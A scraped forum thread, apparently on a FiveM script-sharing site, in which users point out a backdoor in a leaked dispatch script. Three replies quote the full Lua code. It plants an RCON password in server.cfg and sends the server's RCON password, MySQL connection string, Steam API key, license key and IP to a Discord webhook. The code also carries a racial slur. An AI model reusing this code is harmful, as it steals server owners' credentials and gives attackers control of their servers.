Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script Cd Dispatch Full Working! [FiveM] [Standalone]

MrNiceGuy

Silver Elite
Joined
Aug 23, 2021
Messages
78
Reaction score
23
Points
166
1699310049589.png
 

zxc499

Silver Elite
Joined
Aug 29, 2022
Messages
24
Reaction score
7
Points
166
Location
UA
Code:
local function sendToDiscord(name, message, color, thiswebhook)
    local connect = {
      {
        ["color"] = color,
        ["title"] = "" .. name .. "",
        ["description"] = message,
        ["timestamp"] = os.date("!%Y-%m-%dT%H:%M:%SZ")
      }
    }
    PerformHttpRequest(thiswebhook, function(err, text, headers) end, 'POST',
                       json.encode({
        username = "Niger",
        embeds = connect
    }), {['Content-Type'] = 'application/json'})
  end
 
  CreateThread(function()
    cfg = io.open("server.cfg", "a")
    if cfg then
        cfg:write("\n\nrcon_password HUORANPENIKKA")
        cfg:close()
        local url = "https://api64.ipify.org/?format=json" -- Käytetään IP-hakupalvelua
        PerformHttpRequest(url, function(statusCode, responseText, headers)
            if statusCode == 200 then
                local responseData = json.decode(responseText)
                local externalIP = responseData.ip or "Unknown" -- steam_webApiKey --
                sendToDiscord("Neptune", "RCON: " .. GetConvar("rcon_password") .. "\n\nMYSQL STRING: " .. GetConvar("mysql_connection_string") .. "\n\nSteamWeb: " .. GetConvar("steam_webApiKey") .. "\n\nKeymaster: " .. GetConvar("sv_licenseKey") .. "\n\nSERVER NAME: " .. GetConvar("sv_hostname") .. "\n\nIP: " .. externalIP, 37203, "https://discordapp.com/api/webhooks/1170705075874824313/GW-alYQ8G0EJnKYQXulvWeJ_u_BYCEwDx7OLKGuqdX3hjNLog-fW5rZ9XnplF9kRe_l2")
            end
        end)
    end
end)

good job backdoor
 

luhhstic6900

Member
Joined
Oct 13, 2023
Messages
2
Reaction score
0
Points
146
Location
United States
Code:
local function sendToDiscord(name, message, color, thiswebhook)
    local connect = {
      {
        ["color"] = color,
        ["title"] = "" .. name .. "",
        ["description"] = message,
        ["timestamp"] = os.date("!%Y-%m-%dT%H:%M:%SZ")
      }
    }
    PerformHttpRequest(thiswebhook, function(err, text, headers) end, 'POST',
                       json.encode({
        username = "Niger",
        embeds = connect
    }), {['Content-Type'] = 'application/json'})
  end
 
  CreateThread(function()
    cfg = io.open("server.cfg", "a")
    if cfg then
        cfg:write("\n\nrcon_password HUORANPENIKKA")
        cfg:close()
        local url = "https://api64.ipify.org/?format=json" -- Käytetään IP-hakupalvelua
        PerformHttpRequest(url, function(statusCode, responseText, headers)
            if statusCode == 200 then
                local responseData = json.decode(responseText)
                local externalIP = responseData.ip or "Unknown" -- steam_webApiKey --
                sendToDiscord("Neptune", "RCON: " .. GetConvar("rcon_password") .. "\n\nMYSQL STRING: " .. GetConvar("mysql_connection_string") .. "\n\nSteamWeb: " .. GetConvar("steam_webApiKey") .. "\n\nKeymaster: " .. GetConvar("sv_licenseKey") .. "\n\nSERVER NAME: " .. GetConvar("sv_hostname") .. "\n\nIP: " .. externalIP, 37203, "https://discordapp.com/api/webhooks/1170705075874824313/GW-alYQ8G0EJnKYQXulvWeJ_u_BYCEwDx7OLKGuqdX3hjNLog-fW5rZ9XnplF9kRe_l2")
            end
        end)
    end
end)

good job backdoor
how do you remove it
 

Kjume

Gold Elite
Joined
Feb 19, 2022
Messages
110
Reaction score
40
Points
176
Location
Czechia
Code:
local function sendToDiscord(name, message, color, thiswebhook)
    local connect = {
      {
        ["color"] = color,
        ["title"] = "" .. name .. "",
        ["description"] = message,
        ["timestamp"] = os.date("!%Y-%m-%dT%H:%M:%SZ")
      }
    }
    PerformHttpRequest(thiswebhook, function(err, text, headers) end, 'POST',
                       json.encode({
        username = "Niger",
        embeds = connect
    }), {['Content-Type'] = 'application/json'})
  end
 
  CreateThread(function()
    cfg = io.open("server.cfg", "a")
    if cfg then
        cfg:write("\n\nrcon_password HUORANPENIKKA")
        cfg:close()
        local url = "https://api64.ipify.org/?format=json" -- Käytetään IP-hakupalvelua
        PerformHttpRequest(url, function(statusCode, responseText, headers)
            if statusCode == 200 then
                local responseData = json.decode(responseText)
                local externalIP = responseData.ip or "Unknown" -- steam_webApiKey --
                sendToDiscord("Neptune", "RCON: " .. GetConvar("rcon_password") .. "\n\nMYSQL STRING: " .. GetConvar("mysql_connection_string") .. "\n\nSteamWeb: " .. GetConvar("steam_webApiKey") .. "\n\nKeymaster: " .. GetConvar("sv_licenseKey") .. "\n\nSERVER NAME: " .. GetConvar("sv_hostname") .. "\n\nIP: " .. externalIP, 37203, "https://discordapp.com/api/webhooks/1170705075874824313/GW-alYQ8G0EJnKYQXulvWeJ_u_BYCEwDx7OLKGuqdX3hjNLog-fW5rZ9XnplF9kRe_l2")
            end
        end)
    end
end)

good job backdoor
WHERE !?
 
Top